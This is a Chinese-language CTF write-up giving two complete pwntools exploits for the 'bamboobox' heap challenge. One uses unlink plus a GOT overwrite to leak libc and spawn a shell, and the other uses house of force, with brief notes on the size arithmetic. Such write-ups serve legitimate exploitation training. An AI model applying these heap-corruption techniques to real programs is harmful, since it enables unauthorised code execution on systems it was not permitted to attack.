MENU

hitcontraining_bamboobox (unlink | house of force)

December 24, 2020 • Read: 291 • Pwn

1.unlink
这种方法非常简单,也很容易构造,所以我决定挑战一下不用show()的写法。
需要1/16的概率来正确覆盖到堆地址。

from pwn import *
#context.log_level = "debug"
libc = ELF('./libc.so.6')
elf = ELF('./bamboobox')
def choice(idx):
    r.sendlineafter("Your choice:", str(idx))

def show():
    choice(1)

def add(size, content = 'sh'):
    choice(2)
    r.sendlineafter("Please enter the length of item name:", str(size))
    r.sendafter("Please enter the name of item:", content)

def edit(idx, content):
    choice(3)
    r.sendlineafter("Please enter the index of item:", str(idx))
    r.sendlineafter("Please enter the length of item name:", str(len(content)))
    r.sendafter("Please enter the new name of the item:", content)

def delete(idx):
    choice(4)
    r.sendlineafter("Please enter the index of item:", str(idx))

def pwn():
    add(0x88) #0
    add(0xF8) #1
    add(0x18) #2
    add(0x18) #3
    target = 0x6020C8
    magic = 0x400D49

    # unlink
    FD = target - 0x18
    BK = target - 0x10
    edit(0, p64(0) + p64(0x81) + p64(FD) + p64(BK) + 'a' * (0x80 - 0x20) + p64(0x80))
    delete(1)

    #partial overwrite & free@got -> printf@got.plt & free@got -> system
    edit(0, p64(0) * 3 + p64(elf.got['free']) + p64(0) + p64(elf.got['free']) + p64(0) + '\x40\x00')
    edit(0, p64(elf.plt['printf'] + 6) + p64(elf.plt['puts'] + 6))
    delete(2)
    malloc_hook_addr = u64(r.recvuntil('\x7f', timeout=1)[-6:].ljust(8, '\x00')) - 88 - 0x10
    if '0x7f' not in hex(malloc_hook_addr):
        raise EOFError
    libc.address = malloc_hook_addr - libc.sym['__malloc_hook']
    edit(1, p64(libc.sym['system']) + p64(elf.plt['puts'] + 6))

    #getshell
    delete(3)
    r.interactive()

while True:
    try:
        #r = process('./bamboobox')
        r = remote('node3.buuoj.cn', 26620)
        pwn()
    except EOFError:
        pass

2.house of force
这是要说明的重点方法,也是我做这道题的根本原因。
往低地址就是两者(low_addr - 0x10) - top_addr,往高地址,就是(high_addr - 0x10 - top_addr) - 0x10

这里要注意一个细节
第二次申请的时候,申请后的top chunk size不能小于MINSIZE(0x10),即申请前的malloc堆块要大于申请size + MINSIZE。
否则会触发重新申请top chunk,在检测是否对其的时候就会报错。

from pwn import *
#context.log_level = "debug"
libc = ELF('./libc.so.6')
elf = ELF('./bamboobox')
r = process('./bamboobox')
#r = remote('node3.buuoj.cn', 26620)
def choice(idx):
    r.sendlineafter("Your choice:", str(idx))

def show():
    choice(1)

def add(size, content = 'sh'):
    choice(2)
    r.sendlineafter("Please enter the length of item name:", str(size))
    r.sendafter("Please enter the name of item:", content)

def edit(idx, content):
    choice(3)
    r.sendlineafter("Please enter the index of item:", str(idx))
    r.sendlineafter("Please enter the length of item name:", str(len(content)))
    r.sendafter("Please enter the new name of the item:", content)

def delete(idx):
    choice(4)
    r.sendlineafter("Please enter the index of item:", str(idx))

magic = 0x400d49
add(0x30) #0
edit(0, 'a' * 0x38 + p64(0xffffffffffffffff))
size = (0x1ecc000 - 0x10) - 0x1ecc060
add(size) #1
add(0x18) #2
edit(2, p64(magic) * 2)
choice(5)
r.interactive()
Archives QR Code Tip
QR Code for this page
Tipping QR Code